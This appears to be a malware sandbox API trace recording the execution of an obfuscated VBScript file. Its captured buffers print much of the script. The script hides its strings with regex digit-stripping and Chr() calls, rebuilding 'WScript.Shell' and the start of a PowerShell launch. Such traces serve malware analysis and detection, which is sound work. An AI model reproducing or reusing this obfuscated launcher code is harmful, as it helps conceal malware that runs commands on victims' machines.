\"dvu47hf3y\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(uxazfjyx)\r\nuetgwgxt = \"byhzi9a2c\"\r\nxtiwtba = \" 5 eiuw\"\r\nttyghaye = \"czbg  \"\r\nawfgeejje = \"ueibhwgt83ysdzfh\"\r\nibdxuthu = -26603\r\nvbwfwj = \"bzjj4z0\"\r\ndyhtey = uvjivfee.Replace(awfgeejje , sfzzyjdhz ) \r\natufhi = \"tevg7y\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(dyhtey)\r\nwybbuws = \"aycfvx \"\r\neifdgwfw = -6307\r\ntxybtht = \"y hwwzhx\"\r\nsevjcv = \"wcdeighds104xiayjwtv\"\r\ndujywdzg = -76026\r\ncwucdjtg = \"yi04xj76\"\r\nctiwgg = uvjivfee.Replace(sevjcv , sfzzyjdhz ) \r\njtejueug = \" 7ct7z h \"\r\nujdvjbfs = -82103\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(ctiwgg)\r\nuzydgwhda = -59540\r\neztwjyiab = \"9z6ygeedv\"\r\nydjxwchax = \"gesyexfg101jjzaxuy\"\r\nexuiyei = -55195\r\nufsysghy = -12781\r\niwijxhaew = uvjivfee.Replace(ydjxwchax , sfzzyjdhz ) \r\nijbhhttc = -23095\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(iwijxhaew)\r\nzybtxbzsc = -97143\r\niivxajtz = \"4hhaxw\"\r\ndxswgsjyf = -81161\r\ngtfvsca = \"huc16c0w\"\r\niajixt = \"wfzsatbv108fdwbzaf\"\r\nytuzswah = -51395\r\ngtaigbzeg = \"wh82f47\"\r\nvjwidez = uvjivfee.Replace(iajixt , sfzzyjdhz ) \r\nwgsbixz = \"cat7v1\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vjwidez)\r\njjtdyxzt = \"y3j44tx3t\"\r\nfchvseew = \"e9 sg8xa\"\r\niscbzisbz = -23033\r\nfiwcfe = \"fjfhzcxgb108svfighi\"\r\niftjygv = -10944\r\nhfbjbagg = -90570\r\newyfshx = uvjivfee.Replace(fiwcfe , sfzzyjdhz ) \r\nwuuxswz = -96005\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(ewyfshx)\r\nfuzuyhgdu = \"u11iyzt11\"\r\nSet suuztta = CreateObject(uubwyeueb) \r\nttabadwff = -12181\r\nvshvxwbyy = \"szjbagje112aexgtehx\"\r\nijzeea = -71544\r\nicuziffy = -84863\r\nubyaifcvs = uvjivfee.Replace(vshvxwbyy , sfzzyjdhz ) \r\nhbcwswbi = \"fgjiy4y\"\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(ubyaifcvs)\r\nfccjjuj = -8802\r\nthwvhjaua = \" if1gj1v\"\r\nfdzxyegyf = -42521\r\ngfytux = \"tgfssd111uzjsfdd\"\r\nyfttdvuxf = \"95gw fccu\"\r\nxvbxjesig = uvjivfee.Replace(gfytux , sfzzyjdhz ) \r\nxgzzbdv = -81788\r\nivwywgc = -97799\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(xvbxjesig)\r\nxfvcviie = -67808\r\nzcvbbxja = \"6h5tss11\"\r\nudaihs = \"jbuwhhs119ubxuhvw\"\r\ntizehif = \"bfus  z3\"\r\ngvvzsvsbe = uvjivfee.Replace(udaihs , sfzzyjdhz ) \r\ntyfxxe = -11438\r\nzgawsvfhz = -98684\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(gvvzsvsbe)\r\njefhua = \"ijdvgx7\"\r\ncihwassgi = \"jdhu5j\"\r\nywhtgjtgb = \"zxcbiiwcz101csuzsf\"\r\nyhjvvjcd = -76182\r\netadzetz = -12214\r\nsabiuwd = uvjivfee.Replace(ywhtgjtgb , sfzzyjdhz ) \r\nxyyscz = -42305\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(sabiuwd)\r\nibctbg = -33449\r\nuecuyz = \"91 yuy\"\r\njybcjch = \"xd4xa8x\"\r\ncxbczax = -21427\r\nuzhhwci = \"yeshay114iwcxgj\"\r\nvjtcxxeb = -95754\r\nvjgfeasd = -149\r\ntsfgetv = uvjivfee.Replace(uzhhwci , s") returned 117543
	[0031.412] UnmapViewOfFile (lpBaseAddress=0x12881560000) returned 1
	[0031.413] CloseHandle (hObject=0x168) returned 1
	[0031.413] LoadLibraryExW (lpLibFileName="WLDP.DLL", hFile=0x0, dwFlags=0x800) returned 0x7ffc02db0000
	[0032.520] GetProcAddress (hModule=0x7ffc02db0000, lpProcName="WldpGetLockdownPolicy") returned 0x7ffc02db1010
	[0032.520] GetProcAddress (hModule=0x7ffc02db0000, lpProcName="WldpIsClassInApprovedList") returned 0x7ffc02db37b0
	[0032.520] WldpGetLockdownPolicy () returned 0x10000000
	[0032.520] CloseHandle (hObject=0x164) returned 1
	[0032.520] GetSystemDirectoryA (in: lpBuffer=0x17eed7ebd8, uSize=0x0 | out: lpBuffer="") returned 0x14
	[0032.520] GetSystemDirectoryA (in: lpBuffer=0x128815a63d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0032.520] strcpy_s (in: _Dst=0x128815a63e3, _DstSize=0xf, _Src="\\" | out: _Dst="\\") returned 0x0
	[0032.520] strcpy_s (in: _Dst=0x128815a63e4, _DstSize=0xe, _Src="advapi32.dll" | out: _Dst="advapi32.dll") returned 0x0
	[0032.520] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffc154e0000
	[0032.520] GetProcAddress (hModule=0x7ffc154e0000, lpProcName="SaferIdentifyLevel") returned 0x7ffc154eac70
	[0032.520] GetProcAddress (hModule=0x7ffc154e0000, lpProcName="SaferComputeTokenFromLevel") returned 0x7ffc154f2db0
	[0032.521] GetProcAddress (hModule=0x7ffc154e0000, lpProcName="SaferCloseLevel") returned 0x7ffc154f6290
	[0032.521] IdentifyCodeAuthzLevelW () returned 0x1
	[0033.714] GetVersionExA (in: lpVersionInformation=0x17eed7cdd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17eed7cdd0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0033.714] GetUserDefaultLCID () returned 0x409
	[0033.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0x17eed7c940, cchData=2 | out: lpLCData="") returned 2
	[0033.714] IsFileSupportedName () returned 0x1
	[0033.714] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0
	[0033.732] GetSignedDataMsg () returned 0x0
	[0033.732] GetCurrentProcess () returned 0xffffffffffffffff
	[0033.732] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x188, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x17eed7d630, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x17eed7d630*=0x1dc) returned 1
	[0033.732] GetFileSize (in: hFile=0x1dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1cb27
	[0033.732] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0033.732] ReadFile (in: hFile=0x1dc, lpBuffer=0x12883410080, nNumberOfBytesToRead=0x1cb27, lpNumberOfBytesRead=0x17eed7d5f0, lpOverlapped=0x0 | out: lpBuffer=0x12883410080*, lpNumberOfBytesRead=0x17eed7d5f0*=0x1cb27, lpOverlapped=0x0) returned 1
	[0033.734] CoInitialize (pvReserved=0x0) returned 0x1
	[0033.734] CoCreateInstance (in: rclsid=0x7ffbfbb4e808*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbfbb4e818*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x17eed7d550 | out: ppv=0x17eed7d550*=0x128815a99b0) returned 0x0
	[0033.904] __dllonexit () returned 0x7ffbfae6bd60
	[0033.904] __dllonexit () returned 0x7ffbfae6bd80
	[0033.904] GetVersionExA (in: lpVersionInformation=0x17eed7afa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7ffb, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0xfae6bd80, szCSDVersion="\xfb\x7f") | out: lpVersionInformation=0x17eed7afa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0033.904] GetProcessWindowStation () returned 0xc0
	[0033.904] GetUserObjectInformationA (in: hObj=0xc0, nIndex=1, pvInfo=0x17eed7af88, nLength=0xc, lpnLengthNeeded=0x17eed7af80 | out: pvInfo=0x17eed7af88, lpnLengthNeeded=0x17eed7af80) returned 1
	[0033.905] DllGetClassObject (in: rclsid=0x1288139f8b0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7ffc14a825a0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x17eed7bfd0 | out: ppv=0x17eed7bfd0*=0x128815a95a0) returned 0x0
	[0033.905] IClassFactory:CreateInstance (in: This=0x128815a95a0, pUnkOuter=0x0, riid=0x17eed7cea0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x17eed7bfe8 | out: ppvObject=0x17eed7bfe8*=0x128815a99b0) returned 0x0
	[0033.905] GetSystemInfo (in: lpSystemInfo=0x17eed7be68 | out: lpSystemInfo=0x17eed7be68*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0033.905] VirtualQuery (in: lpAddress=0x17eed7be60, lpBuffer=0x17eed7be98, dwLength=0x30 | out: lpBuffer=0x17eed7be98*(BaseAddress=0x17eed7b000, AllocationBase=0x17eec80000, AllocationProtect=0x4, __alignment1=0xfffff801, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30
	[0033.906] IUnknown:AddRef (This=0x128815a99b0) returned 0x2
	[0033.906] IUnknown:Release (This=0x128815a99b0) returned 0x1
	[0033.906] IUnknown:Release (This=0x128815a95a0) returned 0x0
	[0033.906] IUnknown:QueryInterface (in: This=0x128815a99b0, riid=0x7ffbfbb4e818*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x17eed7d4e8 | out: ppvObject=0x17eed7d4e8*=0x128815a99b0) returned 0x0
	[0033.906] IUnknown:Release (This=0x128815a99b0) returned 0x1
	[0033.906] _strnicmp (_Str1="<?xml", _Str="sbgud", _MaxCount=0x5) returned -55
	[0033.906] IsTextUnicode (in: lpv=0x12883410080, iSize=117543, lpiResult=0x17eed7d4d8 | out: lpiResult=0x17eed7d4d8) returned 0
	[0033.906] GetACP () returned 0x4e4
	[0033.907] GetACP () returned 0x4e4
	[0033.907] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12883410080, cbMultiByte=117543, lpWideCharStr=0x1288342cbb0, cchWideChar=117671 | out: lpWideCharStr="sbgudecc = -17979\r\nsfzzyjdhz = \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv = -80055\r\nzjhexcv = 0\r\nevtfga = 141\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet uvjivfee = NEW RegExp\r\nbdhdga = \"ajscw hi\"\r\nbejugg = true\r\nvswdjegxt = \"6uag0 ax\"\r\ngvwuzbz = -56051\r\nuvjivfee.Pattern = \"[^0-9]\"\r\nstjhff = -94464\r\nfzbutew = \"\"\r\njjvxsdhst = -88409\r\nfxzzwgey = \"\"\r\nccssxv = -66192\r\nuvjivfee.Global = True\r\nfvuhje = \"wb7yvad3c\"\r\nyzwfwhfav = \"01bfdyb \"\r\nuubwyeueb = \"\"\r\naiwejax = -97152\r\nztczasg = \"ucv yt \"\r\netvtej = -59959\r\nwcxjdda = \"uzxihu87autihixy\"\r\nvsyihygdt = \"vvtycv\"\r\nyxbgavtw = uvjivfee.Replace(wcxjdda , sfzzyjdhz ) \r\nffhjhjs = -38700\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(yxbgavtw)\r\nbbhciu = \"sdtty0\"\r\nxzhsyhcxt = \"jeix0t1x\"\r\ngecivguu = \"d0saw0f2a\"\r\njshisfa = -29787\r\ncsyexsged = \"gvbhtj83eszwfyigh\"\r\nbyzashg = \"diafe7df\"\r\nbwgivt = uvjivfee.Replace(csyexsged , sfzzyjdhz ) \r\nsczxta = -54162\r\nxyxtzhwg = \"e98 9 6\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(bwgivt)\r\nfcwiii = 8113\r\nscyaes = \"x6ujvww\"\r\nsjvavejau = \"cfxyhxha99fhcyjxjvc\"\r\nxccfce = 5456\r\nuzbjuid = uvjivfee.Replace(sjvavejau , sfzzyjdhz ) \r\ntwvefhgec = \"vv5z9z\"\r\nwdufww = \"4 4t3fe\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(uzbjuid)\r\ngddsaxdsd = \"5z1bghh y\"\r\nzxvgug = 4105\r\neeijfxwv = \"89 a dg2e\"\r\niwadwajc = \"uhvhfsaix114echccdc\"\r\ndgxhaxd = -47193\r\nvehgaavjx = uvjivfee.Replace(iwadwajc , sfzzyjdhz ) \r\nfswdcjgvb = -70420\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vehgaavjx)\r\nwyeixa = \"7viwgetx\"\r\nfjtwwgvau = \"f5ja9v9ia\"\r\nytwxthv = -35754\r\nzjdcaxi = -77819\r\nivwsvt = \"awgtubvj105ssgjscfiz\"\r\nwievsjs = \"jaxy06\"\r\nscbafxs = -41247\r\nvxcheved = uvjivfee.Replace(ivwsvt , sfzzyjdhz ) \r\ndzgctyecj = \"284jh0 wc\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vxcheved)\r\nwahyui = -81116\r\nehaszxivz = -50167\r\njziaythb = \"iizybf112xcdexhsub\"\r\nbssxsxgj = -42090\r\nidxzas = -89913\r\nfyfthee = uvjivfee.Replace(jziaythb , sfzzyjdhz ) \r\nbvugjsu = -22034\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(fyfthee)\r\nivtyua = \"b0szf3vuy\"\r\nvgacgxvjx = \"5i c8730\"\r\nshswbeav = \"a1bzfi\"\r\nzcwxiewaj = \"hafsxs116zhshatcz\"\r\nzwxvbttsw = -88567\r\ndavidijg = \"u3wbyu\"\r\nwshthse = uvjivfee.Replace(zcwxiewaj , sfzzyjdhz ) \r\ngvwtdjj = \"hab 1cv\"\r\nvybbhuwy = \"h4cji86\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(wshthse)\r\nvigjiy = \"sibxf2w 1\"\r\ndayhdg = \"8x zbi5\"\r\ntzbujizjw = -75329\r\nezziddgz = \"gaysfa46wufecgbj\"\r\niiidgd = -50070\r\nzjfahzati = \"g3d0y6azw\"\r\nuxazfjyx = uvjivfee.Replace(ezziddgz , sfzzyjdhz ) \r\nfwdjyyw = \"aiyz y\"\r\ngfcaevd = \"dvu47hf3y\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(uxazfjyx)\r\nuetgwgxt = \"byhzi9a2c\"\r\nxtiwtba = \" 5 eiuw\"\r\nttyghaye = \"czbg  \"\r\nawfgeejje = \"ueibhwgt83ysdzfh\"\r\nibdxuthu = -26603\r\nvbwfwj = \"bzjj4z0\"\r\ndyhtey = uvjivfee.Replace(awfgeejje , sfzzyjdhz ) \r\natufhi = \"tevg7y\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(dyhtey)\r\nwybbuws = \"aycfvx \"\r\neifdgwfw = -6307\r\ntxybtht = \"y hwwzhx\"\r\nsevjcv = \"wcdeighds104xiayjwtv\"\r\ndujywdzg = -76026\r\ncwucdjtg = \"yi04xj76\"\r\nctiwgg = uvjivfee.Replace(sevjcv , sfzzyjdhz ) \r\njtejueug = \" 7ct7z h \"\r\nujdvjbfs = -82103\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(ctiwgg)\r\nuzydgwhda = -59540\r\neztwjyiab = \"9z6ygeedv\"\r\nydjxwchax = \"gesyexfg101jjzaxuy\"\r\nexuiyei = -55195\r\nufsysghy = -12781\r\niwijxhaew = uvjivfee.Replace(ydjxwchax , sfzzyjdhz ) \r\nijbhhttc = -23095\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(iwijxhaew)\r\nzybtxbzsc = -97143\r\niivxajtz = \"4hhaxw\"\r\ndxswgsjyf = -81161\r\ngtfvsca = \"huc16c0w\"\r\niajixt = \"wfzsatbv108fdwbzaf\"\r\nytuzswah = -51395\r\ngtaigbzeg = \"wh82f47\"\r\nvjwidez = uvjivfee.Replace(iajixt , sfzzyjdhz ) \r\nwgsbixz = \"cat7v1\"\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(vjwidez)\r\njjtdyxzt = \"y3j44tx3t\"\r\nfchvseew = \"e9 sg8xa\"\r\niscbzisbz = -23033\r\nfiwcfe = \"fjfhzcxgb108svfighi\"\r\niftjygv = -10944\r\nhfbjbagg = -90570\r\newyfshx = uvjivfee.Replace(fiwcfe , sfzzyjdhz ) \r\nwuuxswz = -96005\r\nuubwyeueb = fzbutew & fxzzwgey & uubwyeueb & Chr(ewyfshx)\r\nfuzuyhgdu = \"u11iyzt11\"\r\nSet suuztta = CreateObject(uubwyeueb) \r\nttabadwff = -12181\r\nvshvxwbyy = \"szjbagje112aexgtehx\"\r\nijzeea = -71544\r\nicuziffy = -84863\r\nubyaifcvs = uvjivfee.Replace(vshvxwbyy , sfzzyjdhz ) \r\nhbcwswbi = \"fgjiy4y\"\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(ubyaifcvs)\r\nfccjjuj = -8802\r\nthwvhjaua = \" if1gj1v\"\r\nfdzxyegyf = -42521\r\ngfytux = \"tgfssd111uzjsfdd\"\r\nyfttdvuxf = \"95gw fccu\"\r\nxvbxjesig = uvjivfee.Replace(gfytux , sfzzyjdhz ) \r\nxgzzbdv = -81788\r\nivwywgc = -97799\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(xvbxjesig)\r\nxfvcviie = -67808\r\nzcvbbxja = \"6h5tss11\"\r\nudaihs = \"jbuwhhs119ubxuhvw\"\r\ntizehif = \"bfus  z3\"\r\ngvvzsvsbe = uvjivfee.Replace(udaihs , sfzzyjdhz ) \r\ntyfxxe = -11438\r\nzgawsvfhz = -98684\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(gvvzsvsbe)\r\njefhua = \"ijdvgx7\"\r\ncihwassgi = \"jdhu5j\"\r\nywhtgjtgb = \"zxcbiiwcz101csuzsf\"\r\nyhjvvjcd = -76182\r\netadzetz = -12214\r\nsabiuwd = uvjivfee.Replace(ywhtgjtgb , sfzzyjdhz ) \r\nxyyscz = -42305\r\nisaeac = fzbutew& fxzzwgey &  isaeac & Chr(sabiuwd)\r\nibctbg = -33449\r\nuecuyz = \"91 yuy\"\r\njybcjch = \"xd4xa8x\"\r\ncxbczax = -21427\r\nuzhhwci = \"yeshay114iwcxgj\"\r\nvjtcxxeb = -95754\r\nvjgfeasd = -149\r\ntsfgetv = uvjivfee.Replace(uzhhwci , s") returned 117543
	[0033.911] CoUninitialize () 
	[0033.911] CloseHandle (hObject=0x1dc) returned 1
	[0033.911] wcsncmp (_String1="sbgudecc = -17979\r\nsfzzyjdhz = \"\"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0033.912] wcsncmp (_String1="bgudecc = -17979\r\nsfzzyjdhz = \"\"\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85
	[0033.912] wcsncmp (_String1="gudecc = -17979\r\nsfzzyjdhz = \"\"\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.912] wcsncmp (_String1="udecc = -17979\r\nsfzzyjdhz = \"\"\r\nb", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.912] wcsncmp (_String1="decc = -17979\r\nsfzzyjdhz = \"\"\r\nbz", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0033.912] wcsncmp (_String1="ecc = -17979\r\nsfzzyjdhz = \"\"\r\nbza", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.912] wcsncmp (_String1="cc = -17979\r\nsfzzyjdhz = \"\"\r\nbzag", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0033.912] wcsncmp (_String1="c = -17979\r\nsfzzyjdhz = \"\"\r\nbzagx", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0033.912] wcsncmp (_String1=" = -17979\r\nsfzzyjdhz = \"\"\r\nbzagxy", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.912] wcsncmp (_String1="= -17979\r\nsfzzyjdhz = \"\"\r\nbzagxye", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.912] wcsncmp (_String1=" -17979\r\nsfzzyjdhz = \"\"\r\nbzagxye ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.912] wcsncmp (_String1="-17979\r\nsfzzyjdhz = \"\"\r\nbzagxye =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32
	[0033.912] wcsncmp (_String1="17979\r\nsfzzyjdhz = \"\"\r\nbzagxye = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36
	[0033.912] wcsncmp (_String1="7979\r\nsfzzyjdhz = \"\"\r\nbzagxye = \"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 42
	[0033.912] wcsncmp (_String1="979\r\nsfzzyjdhz = \"\"\r\nbzagxye = \"e", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44
	[0033.912] wcsncmp (_String1="79\r\nsfzzyjdhz = \"\"\r\nbzagxye = \"e0", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 42
	[0033.912] wcsncmp (_String1="9\r\nsfzzyjdhz = \"\"\r\nbzagxye = \"e0t", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44
	[0033.912] wcsncmp (_String1="\r\nsfzzyjdhz = \"\"\r\nbzagxye = \"e0t0", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76
	[0033.912] wcsncmp (_String1="\nsfzzyjdhz = \"\"\r\nbzagxye = \"e0t0t", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.912] wcsncmp (_String1="sfzzyjdhz = \"\"\r\nbzagxye = \"e0t0t7", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0033.912] wcsncmp (_String1="fzzyjdhz = \"\"\r\nbzagxye = \"e0t0t7x", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89
	[0033.912] wcsncmp (_String1="zzyjdhz = \"\"\r\nbzagxye = \"e0t0t7x2", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109
	[0033.912] wcsncmp (_String1="zyjdhz = \"\"\r\nbzagxye = \"e0t0t7x2u", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109
	[0033.912] wcsncmp (_String1="yjdhz = \"\"\r\nbzagxye = \"e0t0t7x2u\"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108
	[0033.912] wcsncmp (_String1="jdhz = \"\"\r\nbzagxye = \"e0t0t7x2u\"\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.912] wcsncmp (_String1="dhz = \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0033.912] wcsncmp (_String1="hz = \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\ni", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0033.912] wcsncmp (_String1="z = \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\nis", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109
	[0033.912] wcsncmp (_String1=" = \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\nisa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.912] wcsncmp (_String1="= \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\nisae", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.912] wcsncmp (_String1=" \"\"\r\nbzagxye = \"e0t0t7x2u\"\r\nisaea", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.912] wcsncmp (_String1="\"\"\r\nbzagxye = \"e0t0t7x2u\"\r\nisaeac", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.912] wcsncmp (_String1="\"\r\nbzagxye = \"e0t0t7x2u\"\r\nisaeac ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.913] wcsncmp (_String1="\r\nbzagxye = \"e0t0t7x2u\"\r\nisaeac =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59
	[0033.913] wcsncmp (_String1="\nbzagxye = \"e0t0t7x2u\"\r\nisaeac = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.913] wcsncmp (_String1="bzagxye = \"e0t0t7x2u\"\r\nisaeac = \"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85
	[0033.913] wcsncmp (_String1="zagxye = \"e0t0t7x2u\"\r\nisaeac = \"\"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109
	[0033.913] wcsncmp (_String1="agxye = \"e0t0t7x2u\"\r\nisaeac = \"\"\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0033.913] wcsncmp (_String1="gxye = \"e0t0t7x2u\"\r\nisaeac = \"\"\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.913] wcsncmp (_String1="xye = \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nu", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107
	[0033.913] wcsncmp (_String1="ye = \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nuj", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108
	[0033.913] wcsncmp (_String1="e = \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nujw", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.913] wcsncmp (_String1=" = \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nujwj", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.913] wcsncmp (_String1="= \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nujwji", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.913] wcsncmp (_String1=" \"e0t0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.913] wcsncmp (_String1="\"e0t0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.913] wcsncmp (_String1="e0t0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.913] wcsncmp (_String1="0t0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35
